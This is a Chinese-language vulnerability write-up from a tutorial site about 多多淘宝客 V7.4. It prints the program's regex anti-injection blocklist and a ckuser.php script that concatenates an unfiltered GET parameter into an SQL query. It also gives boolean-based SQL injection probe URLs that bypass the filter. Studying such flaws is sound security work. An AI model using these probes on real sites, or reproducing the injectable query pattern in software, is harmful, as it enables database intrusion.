手机
当前位置:查字典教程网 >网络安全 >漏洞分析 >多多淘宝客V7.4绕过防注入及一个注入漏洞的分析
多多淘宝客V7.4绕过防注入及一个注入漏洞的分析
摘要:由于程序是开源程序并下载其程序看了一番。其实程序员还是有一点安全意识的:防注入代码:复制代码代码如下://要过滤的非法字符$ArrFiltr...

由于程序是开源程序

并下载其程序看了一番。其实程序员还是有一点安全意识的:

防注入代码:

复制代码代码如下:

//要过滤的非法字符

$ArrFiltrate = array (

"#union#i",

"#<script#i",

"#/script>#i",

"#select#i",

"#alert#i",

"#javascript#i",

"#<table#i",

"#<td#i",

"#"#i",

"#'#i",

"#delete#i",

"#vbscript#i",

"#applet#i",

"#frame#i",

"#<div#i",

"#update#i",

"#'#i",

"#union #i",

"#select #i",

"#delete #i",

"#update #i",

"#and #i",

"#;#i",

"#update#i"

);

$replacements='';

function FunStringExist(&$array,$ArrFiltrate,$replacements)

{

if (is_array($array))

{

foreach ($array as $key => $value)

{

if (is_array($value))

FunStringExist($array[$key],$ArrFiltrate,$replacements);

else

$array[$key] = preg_replace($ArrFiltrate, $replacements, $value);

}

}

}

FunStringExist($_GET,$ArrFiltrate,$replacements);

FunStringExist($_POST,$ArrFiltrate,$replacements);

这段代码多少还是有瑕疵的、只过滤 get post 我们只要找调用request的地方

别一个文件并没有调用防注入程序,导致字符注入、但受gpc影响

复制代码代码如下:

header("Content-Type:text/html;charset=utf-8");

include "../comm/config.php";

$uname = trim($_GET["name"]);

if($uname==''){

echo "true";

}else{

$con = @mysql_connect("$dbserver","$dbuser","$dbpass" )or die(ERR_DB);

mysql_select_db("$dbname",$con)or die("can not choose the dbname!");

$query="select * from ".$BIAOTOU."user where ddusername='".$uname."'";

mysql_query("set names utf8");

$res=mysql_query($query);

if(mysql_num_rows($res)!=0)

{echo "true";}

else

{echo "false";}

}

首先注册一个用户.让程序能过判断

ckuser.php?name=maxadd' and 1=1 and ''='

返回true

ckuser.php?name=maxadd' and 1=2 and ''='

返回false

【多多淘宝客V7.4绕过防注入及一个注入漏洞的分析】相关文章:

多个D-Link 产品含跨站脚本攻击以及拒绝服务漏洞

讯时后台管理系统v4.9的鸡肋漏洞分析

BBSXP论坛程序New.asp页面过滤不严导致SQL注入漏洞

ECShop 注射漏洞分析

Windows 内核漏洞 ms08025 分析

dedecms 5.6的最新注入漏洞

Mozilla邮件客户端MIME外部主体堆溢出漏洞

PHPCMS2007 SP6 vote模块SQL注射漏洞的分析

微软IE5与IE6存在 FTP跨站命令注入漏洞

又拍图片管家支付非法充值的漏洞分析及修复方法(图)

精品推荐
分类导航